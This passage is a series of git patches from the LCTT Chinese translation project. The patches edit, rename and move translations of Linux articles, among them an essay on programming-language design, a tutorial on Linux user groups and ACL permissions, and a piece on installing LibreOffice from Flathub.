[LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[1]:https://www.linux.com/files/images/group-people-16453561920jpg -[2]:https://www.linux.com/files/images/groups1jpg -[3]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux -[4]:https://www.linux.com/licenses/category/creative-commons-zero -[5]:https://www.linux.com/licenses/category/used-permission From 7683f19b3eea039fe0de6dbe3342af78f30a4bed Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Tue, 5 Dec 2017 13:01:06 +0800 Subject: [PATCH 0274/1627] Delete Language engineering for great justice --- .../Language engineering for great justice | 24 ------------------- 1 file changed, 24 deletions(-) delete mode 100644 translated/tech/Language engineering for great justice diff --git a/translated/tech/Language engineering for great justice b/translated/tech/Language engineering for great justice deleted file mode 100644 index d26f9319bd..0000000000 --- a/translated/tech/Language engineering for great justice +++ /dev/null @@ -1,24 +0,0 @@ -最合理的语言工程模式 -当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。 -对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。 -在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。 -在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。 -现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题? -所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。 -在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。 -如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。 -这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 -在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 -当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用! -相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。 -C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。 -另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。 -今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。 -即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。 -我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。 -这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。 -当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。 -五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。 -在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。 - - From d397c99a0c13a049a22b03bd4ca69c66408d246a Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Tue, 5 Dec 2017 13:13:33 +0800 Subject: [PATCH 0275/1627] Translated --- ...ustice. => 20171118 Language engineering for great justice.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/tech/{20171118 Language engineering for great justice. => 20171118 Language engineering for great justice.md} (100%) diff --git a/translated/tech/20171118 Language engineering for great justice. b/translated/tech/20171118 Language engineering for great justice.md similarity index 100% rename from translated/tech/20171118 Language engineering for great justice. rename to translated/tech/20171118 Language engineering for great justice.md From 1cf098441ad2c87f765b01cf53657a78524494b6 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Sun, 3 Dec 2017 20:44:35 +0800 Subject: [PATCH 0276/1627] modified by qhwdw --- core.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/core.md b/core.md index da45c009fc..3093f4ae52 100644 --- a/core.md +++ b/core.md @@ -36,4 +36,4 @@ - 除非必要,合并 PR 时不要 squash-merge wxy@LCTT -2016/12/24 \ No newline at end of file +2017/12/24 From c0ea07298e5302ab39aacdd1acbc671dcb401ad7 Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Sun, 3 Dec 2017 20:47:57 +0800 Subject: [PATCH 0277/1627] =?UTF-8?q?=E6=9B=B4=E6=96=B0=E6=97=A5=E6=9C=9F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- core.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/core.md b/core.md index 3093f4ae52..2ec8aa89cf 100644 --- a/core.md +++ b/core.md @@ -36,4 +36,4 @@ - 除非必要,合并 PR 时不要 squash-merge wxy@LCTT -2017/12/24 +2016/12/24 From e81680b74e189e056f5a35751b2bbb256c3d2e28 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Mon, 4 Dec 2017 22:48:12 +0800 Subject: [PATCH 0278/1627] Translating by qhwdw --- ...20160922 A Linux users guide to Logical Volume Management.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md index ff0e390f38..baed1b3976 100644 --- a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md +++ b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md @@ -1,4 +1,4 @@ -A Linux user's guide to Logical Volume Management +Translating by qhwdw A Linux user's guide to Logical Volume Management ============================================================ ![Logical Volume Management (LVM)](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003499_01_other11x_cc.png?itok=I_kCDYj0 "Logical Volume Management (LVM)") From d69030fc577d9d34f8cae427bd5f3362b4947669 Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Mon, 4 Dec 2017 23:14:31 +0800 Subject: [PATCH 0279/1627] Revert "Translating by qhwdw" --- core.md | 2 +- ...20160922 A Linux users guide to Logical Volume Management.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/core.md b/core.md index 2ec8aa89cf..da45c009fc 100644 --- a/core.md +++ b/core.md @@ -36,4 +36,4 @@ - 除非必要,合并 PR 时不要 squash-merge wxy@LCTT -2016/12/24 +2016/12/24 \ No newline at end of file diff --git a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md index baed1b3976..ff0e390f38 100644 --- a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md +++ b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md @@ -1,4 +1,4 @@ -Translating by qhwdw A Linux user's guide to Logical Volume Management +A Linux user's guide to Logical Volume Management ============================================================ ![Logical Volume Management (LVM)](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003499_01_other11x_cc.png?itok=I_kCDYj0 "Logical Volume Management (LVM)") From 068f19be89218a9006cfab8e6483416f31f6a0ea Mon Sep 17 00:00:00 2001 From: imquanquan Date: Mon, 4 Dec 2017 23:15:21 +0800 Subject: [PATCH 0280/1627] fix errors based on the previous translations --- ...ow to Manage Users with Groups in Linux.md | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/translated/tech/20171201 How to Manage Users with Groups in Linux.md b/translated/tech/20171201 How to Manage Users with Groups in Linux.md index 8baac8707b..1927de6817 100644 --- a/translated/tech/20171201 How to Manage Users with Groups in Linux.md +++ b/translated/tech/20171201 How to Manage Users with Groups in Linux.md @@ -5,13 +5,13 @@ ![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/group-of-people-1645356_1920.jpg?itok=rJlAxBSV) -在本教程中了解如何通过用户组和访问控制表(ACL)来管理用户。 +本教程可以了解如何通过用户组和访问控制表(ACL)来管理用户。 [创意共享协议][4] -当你需要管理一台容纳多个用户的 Linux 机器时,比起一些基本的用户管理工具所提供的方法,有时候你需要对这些用户采取更多的用户权限管理方式。特别是当你要管理某些用户的权限时,这个想法尤为重要。比如说,你有一个目录,一个用户组中的用户可以通过读和写的权限访问这个目录,而其他用户组中的用户对这个目录只有读的权限。通过 Linux 这是完全可以实现的。但是你首先必须了解如何通过用户组和访问控制表(ACL)来管理用户。 +当你需要管理一台容纳多个用户的 Linux 机器时,比起一些基本的用户管理工具所提供的方法,有时候你需要对这些用户采取更多的用户权限管理方式。特别是当你要管理某些用户的权限时,这个想法尤为重要。比如说,你有一个目录,某个用户组中的用户可以通过读和写的权限访问这个目录,而其他用户组中的用户对这个目录只有读的权限。在 Linux 中,这是完全可以实现的。但前提是你必须先了解如何通过用户组和访问控制表(ACL)来管理用户。 -我们将从简单的用户开始,逐渐深入到复杂的访问控制表(ACL)。你所需要做的一切都将在你选择的 Linux 发行版中完成。本文的重点是用户组,所以不会涉及到关于用户的基础知识。 +我们将从简单的用户开始,逐渐深入到复杂的访问控制表(ACL)。你可以在你所选择的 Linux 发行版完成你所需要做的一切。本文的重点是用户组,所以不会涉及到关于用户的基础知识。 为了达到演示的目的,我将假设: @@ -27,7 +27,7 @@ * editors -olivia 属于 editors 用户组,而 nathan 属于 readers 用户组。reader 用户组对 ``/DATA`` 目录只有读的权限,而 editors 用户组则对 ``/DATA`` 目录同时有读和写的权限。当然,这是个非常小的任务,但它会给你基本的用法。你可以扩展这个任务以适应你其他更大的需求。 +olivia 属于 editors 用户组,而 nathan 属于 readers 用户组。reader 用户组对 ``/DATA`` 目录只有读的权限,而 editors 用户组则对 ``/DATA`` 目录同时有读和写的权限。当然,这是个非常小的任务,但它会给你基本的信息·。你可以扩展这个任务以适应你其他更大的需求。 我将在 Ubuntu 16.04 Server 平台上进行演示。这些命令都是通用的,唯一不同的是,要是在你的发行版中不使用 sudo 命令,你必须切换到 root 用户来执行这些命令。 @@ -74,7 +74,7 @@ addgroup editors [Used with permission][5] -创建用户组后,我们需要给他们添加用户。我们用以下命令来将 nathan 添加到 readers 用户组: +创建用户组后,我们需要添加我们的用户到这两个用户组。我们用以下命令来将 nathan 用户添加到 readers 用户组: ``` sudo usermod -a -G readers nathan @@ -85,11 +85,11 @@ sudo usermod -a -G readers nathan sudo usermod -a -G editors olivia ``` -现在我们已经准备好用用户组来管理用户了。 +现在我们可以通过用户组来管理用户了。 ### 给用户组授予目录的权限 -假设你有个目录 ``/READERS``,允许 readers 用户组的所有成员访问这个目录。首先,我们执行以下命令来更改目录所属用户组: +假设你有个目录 ``/READERS`` 且允许 readers 用户组的所有成员访问这个目录。首先,我们执行以下命令来更改目录所属用户组: ``` sudo chown -R :readers /READERS @@ -101,7 +101,7 @@ sudo chown -R :readers /READERS sudo chmod -R g-w /READERS ``` -然后我们执行下面的命令来收回其他用户对这个目录的访问权限(以防止任何不在读者组中的用户访问这个目录里的文件): +然后我们执行下面的命令来收回其他用户对这个目录的访问权限(以防止任何不在 readers 组中的用户访问这个目录里的文件): ``` sudo chmod -R o-x /READERS @@ -126,7 +126,7 @@ sudo chmod -R o-x /EDITORS ### 使用访问控制表(ACL) -现在,让我们把这个问题变得棘手一点。假设你有一个目录 ``/DATA`` 并且你想给 readers 用户组的成员读取权限同时给 editors 用户组的成员读和写的权限。为此,你必须要用到 setfacl 命令。setfacl 命令可以为文件或文件夹设置一个访问控制表(ACL)。 +现在,让我们把这个问题变得棘手一点。假设你有一个目录 ``/DATA`` 并且你想给 readers 用户组的成员读取权限并同时给 editors 用户组的成员读和写的权限。为此,你必须要用到 setfacl 命令。setfacl 命令可以为文件或文件夹设置一个访问控制表(ACL)。 这个命令的结构如下: @@ -142,7 +142,7 @@ sudo setfacl -m g:readers:rx -R /DATA 现在 readers 用户组里面的每一个用户都可以读取 /DATA 目录里的文件了,但是他们不能修改里面的内容。 -为了给 editors 用户组里面的用户读写权限,我们执行了以下的命令: +为了给 editors 用户组里面的用户读写权限,我们执行了以下命令: ``` sudo setfacl -m g:editors:rwx -R /DATA @@ -151,7 +151,7 @@ sudo setfacl -m g:editors:rwx -R /DATA ### 更多的权限控制 -使用访问控制表(ACL),你可以实现你所需的权限控制。你可以实现将用户添加到用户组,并且可靠灵活地控制这些用户组对每个目录的权限以达到你的需求。想要了解上述工具的更多信息,可以执行下列的命令: +使用访问控制表(ACL),你可以实现你所需的权限控制。你可以添加用户到用户组,并且灵活地控制这些用户组对每个目录的权限以达到你的需求。如果想了解上述工具的更多信息,可以执行下列的命令: * man usradd From 05f95c0e67b3a3176a3c9b1008dccb3a8a00c205 Mon Sep 17 00:00:00 2001 From: Unknown Date: Tue, 5 Dec 2017 07:22:51 +0800 Subject: [PATCH 0281/1627] translating by aiwhj translating by aiwhj --- .../20171129 5 best practices for getting started with DevOps.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171129 5 best practices for getting started with DevOps.md b/sources/tech/20171129 5 best practices for getting started with DevOps.md index 962f37aaf4..7694180c14 100644 --- a/sources/tech/20171129 5 best practices for getting started with DevOps.md +++ b/sources/tech/20171129 5 best practices for getting started with DevOps.md @@ -1,3 +1,4 @@ +translating---aiwhj 5 best practices for getting started with DevOps ============================================================ From f4a223025abc1b3d13b99264dcd4c7e89ed7b156 Mon Sep 17 00:00:00 2001 From: Sihua Zheng Date: Tue, 5 Dec 2017 09:12:33 +0800 Subject: [PATCH 0282/1627] translated --- ...ilable on Flathub the Flatpak App Store.md | 73 ------------------- ...ilable on Flathub the Flatpak App Store.md | 70 ++++++++++++++++++ 2 files changed, 70 insertions(+), 73 deletions(-) delete mode 100644 sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md create mode 100644 translated/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md diff --git a/sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md b/sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md deleted file mode 100644 index fe72e37128..0000000000 --- a/sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md +++ /dev/null @@ -1,73 +0,0 @@ -translating---geekpi - - -# LibreOffice Is Now Available on Flathub, the Flatpak App Store - -![LibreOffice on Flathub](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/libroffice-on-flathub-750x250.jpeg) - -LibreOffice is now available to install from [Flathub][3], the centralised Flatpak app store. - -Its arrival allows anyone running a modern Linux distribution to install the latest stable release of LibreOffice in a click or two, without having to hunt down a PPA, tussle with tarballs or wait for a distro provider to package it up. - -A [LibreOffice Flatpak][5] has been available for users to download and install since August of last year and the [LibreOffice 5.2][6] release. - -What’s “new” here is the distribution method. Rather than release updates through their own dedicated server The Document Foundation has opted to use Flathub. - -This is  _great_  news for end users as it means there’s one less repo to worry about adding on a fresh install, but it’s also good news for Flatpak advocates too: LibreOffice is open-source software’s most popular productivity suite. Its support for both format and app store is sure to be warmly welcomed. - -At the time of writing you can install LibreOffice 5.4.2 from Flathub. New stable releases will be added as and when they’re released. - -### Enable Flathub on Ubuntu - -![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/flathub-750x495.png) - -Fedora, Arch, and Linux Mint 18.3 users have Flatpak installed, ready to go, out of the box. Mint even comes with the Flathub remote pre-enabled. - -[Install LibreOffice from Flathub][7] - -To get Flatpak up and running on Ubuntu you first have to install it: - -``` -sudo apt install flatpak gnome-software-plugin-flatpak -``` - -To be able to install apps from Flathub you need to add the Flathub remote server: - -``` -flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo -``` - -That’s pretty much it. Just log out and back in (so that Ubuntu Software refreshes its cache) and you  _should_  be able to find any Flatpak apps available on Flathub through the Ubuntu Software app. - -In this instance, search for “LibreOffice” and locate the result that has a line of text underneath mentioning Flathub. (Do bear in mind that Ubuntu has tweaked the Software client to shows Snap app results above everything else, so you may need scroll down the list of results to see it). - -There is a [bug with installing Flatpak apps][8] from a flatpakref file, so if the above method doesn’t work you can also install Flatpak apps form Flathub using the command line. - -The Flathub website lists the command needed to install each app. Switch to the “Command Line” tab to see them. - -#### More apps on Flathub - -If you read this site regularly enough you’ll know that I  _love_  Flathub. It’s home to some of my favourite apps (Corebird, Parlatype, GNOME MPV, Peek, Audacity, GIMP… etc). I get the latest, stable versions of these apps (plus any dependencies they need) without compromise. - -And, as I tweeted a week or so back, most Flatpak apps now look great with GTK themes — no more [workarounds][9]required! - --------------------------------------------------------------------------------- - -via: http://www.omgubuntu.co.uk/2017/11/libreoffice-now-available-flathub-flatpak-app-store - -作者:[ JOEY SNEDDON ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://plus.google.com/117485690627814051450/?rel=author -[1]:https://plus.google.com/117485690627814051450/?rel=author -[2]:http://www.omgubuntu.co.uk/category/news -[3]:http://www.flathub.org/ -[4]:http://www.omgubuntu.co.uk/2017/11/libreoffice-now-available-flathub-flatpak-app-store -[5]:http://www.omgubuntu.co.uk/2016/08/libreoffice-5-2-released-whats-new -[6]:http://www.omgubuntu.co.uk/2016/08/libreoffice-5-2-released-whats-new -[7]:https://flathub.org/repo/appstream/org.libreoffice.LibreOffice.flatpakref -[8]:https://bugs.launchpad.net/ubuntu/+source/gnome-software/+bug/1716409 -[9]:http://www.omgubuntu.co.uk/2017/05/flatpak-theme-issue-fix diff --git a/translated/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md b/translated/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md new file mode 100644 index 0000000000..4edb744098 --- /dev/null +++ b/translated/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md @@ -0,0 +1,70 @@ +# LibreOffice 现在在 Flatpak 的 Flathub 应用商店提供 + +![LibreOffice on Flathub](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/libroffice-on-flathub-750x250.jpeg) + +LibreOffice 现在可以从集中化的 Flatpak 应用商店 [Flathub][3] 进行安装。 + +它的到来使任何运行现代 Linux 发行版的人都能只点击一两次安装 LibreOffice 的最新稳定版本,而无需搜索 PPA,纠缠 tar 包或等待发行商将其打包。 + +自去年 8 月份以来,[LibreOffice Flatpak][5] 已经可供用户下载和安装 [LibreOffice 5.2][6]。 + +这里“新”的是发行方法。文档基金会选择使用 Flathub 而不是专门的服务器来发布更新。 + +这对于终端用户来说是一个_很好_的消息,因为这意味着不需要在新安装时担心仓库,但对于 Flatpak 的倡议者来说也是一个好消息:LibreOffice 是开源软件最流行的生产力套件。它对格式和应用商店的支持肯定会受到热烈的欢迎。 + +在撰写本文时,你可以从 Flathub 安装 LibreOffice 5.4.2。新的稳定版本将在发布时添加。 + +### 在 Ubuntu 上启用 Flathub + +![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/flathub-750x495.png) + +Fedora、Arch 和 Linux Mint 18.3 用户已经安装了 Flatpak,随时可以开箱即用。Mint 甚至预启用了 Flathub remote。 + +[从 Flathub 安装 LibreOffice][7] + +要在 Ubuntu 上启动并运行 Flatpak,首先必须安装它: + +``` +sudo apt install flatpak gnome-software-plugin-flatpak +``` + +为了能够从 Flathub 安装应用程序,你需要添加 Flathub 远程服务器: + +``` +flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo +``` + +这就行了。只需注销并返回(以便 Ubuntu Software 刷新其缓存),之后你应该能够通过 Ubuntu Software 看到 Flathub 上的任何 Flatpak 程序了。 + +在本例中,搜索 “LibreOffice” 并在结果中找到下面有 Flathub 提示的结果。(请记住,Ubuntu 已经调整了客户端,来将 Snap 程序显示在最上面,所以你可能需要向下滚动列表来查看它)。 + +从 flatpakref 中[安装 Flatpak 程序有一个 bug][8],所以如果上面的方法不起作用,你也可以使用命令行从 Flathub 中安装 Flathub 程序。 + +Flathub 网站列出了安装每个程序所需的命令。切换到“命令行”选项卡来查看它们。 + +#### Flathub 上更多的应用 + +如果你经常看这个网站,你就会知道我喜欢 Flathub。这是我最喜欢的一些应用(Corebird、Parlatype、GNOME MPV、Peek、Audacity、GIMP 等)的家园。我无需折衷就能获得这些应用程序的最新,稳定版本(加上它们需要的所有依赖)。 + +而且,在我 twiiter 上发布一周左右后,大多数 Flatpak 应用现在看起来有很棒 GTK 主题 - 不再需要[临时方案][9]了! + +-------------------------------------------------------------------------------- + +via: http://www.omgubuntu.co.uk/2017/11/libreoffice-now-available-flathub-flatpak-app-store + +作者:[ JOEY SNEDDON ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://plus.google.com/117485690627814051450/?rel=author +[1]:https://plus.google.com/117485690627814051450/?rel=author +[2]:http://www.omgubuntu.co.uk/category/news +[3]:http://www.flathub.org/ +[4]:http://www.omgubuntu.co.uk/2017/11/libreoffice-now-available-flathub-flatpak-app-store +[5]:http://www.omgubuntu.co.uk/2016/08/libreoffice-5-2-released-whats-new +[6]:http://www.omgubuntu.co.uk/2016/08/libreoffice-5-2-released-whats-new +[7]:https://flathub.org/repo/appstream/org.libreoffice.LibreOffice.flatpakref +[8]:https://bugs.launchpad.net/ubuntu/+source/gnome-software/+bug/1716409 +[9]:http://www.omgubuntu.co.uk/2017/05/flatpak-theme-issue-fix From c600cfb37b2b05a5466c28e4f44632f121c1fada Mon Sep 17 00:00:00 2001 From: geekpi Date: Tue, 5 Dec 2017 09:16:46 +0800 Subject: [PATCH 0283/1627] translating --- .../20171125 AWS to Help Build ONNX Open Source AI Platform.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md b/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md index c09d66bc57..1e9424178e 100644 --- a/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md +++ b/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md @@ -1,3 +1,5 @@ +translating---geekpi + AWS to Help Build ONNX Open Source AI Platform ============================================================ ![onnx-open-source-ai-platform](https://www.linuxinsider.com/article_images/story_graphics_xlarge/xl-2017-onnx-1.jpg) From 06092620560a75c22c0289edc8badced8995d96e Mon Sep 17 00:00:00 2001 From: runningwater Date: Tue, 5 Dec 2017 09:32:57 +0800 Subject: [PATCH 0284/1627] Update 20171128 Why Python and Pygame are a great pair for beginning programmers.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 翻译中 --- ...on and Pygame are a great pair for beginning programmers.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md b/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md index 479bfb1232..9afdfbb2b1 100644 --- a/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md +++ b/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md @@ -1,3 +1,4 @@ +(translating by runningwater) Why Python and Pygame are a great pair for beginning programmers ============================================================ @@ -101,7 +102,7 @@ Despite my recommendation, I always suspect that kids soon move to JavaScript. A via: https://opensource.com/article/17/11/pygame 作者:[Craig Oda ][a] -译者:[译者ID](https://github.com/译者ID) +译者:[runningwater](https://github.com/runningwater) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 945cbd4020c60a13c7c7d8ad21ce39bdfc893db1 Mon Sep 17 00:00:00 2001 From: darksun Date: Mon, 4 Dec 2017 23:22:15 +0800 Subject: [PATCH 0285/1627] take a break --- ... Your Linux Server Has Been Compromised.md | 78 ++++++++++--------- 1 file changed, 40 insertions(+), 38 deletions(-) diff --git a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md index dd61ad7a95..a7af1098c7 100644 --- a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md +++ b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md @@ -1,28 +1,27 @@ -translating by lujun9972 -How To Tell If Your Linux Server Has Been Compromised 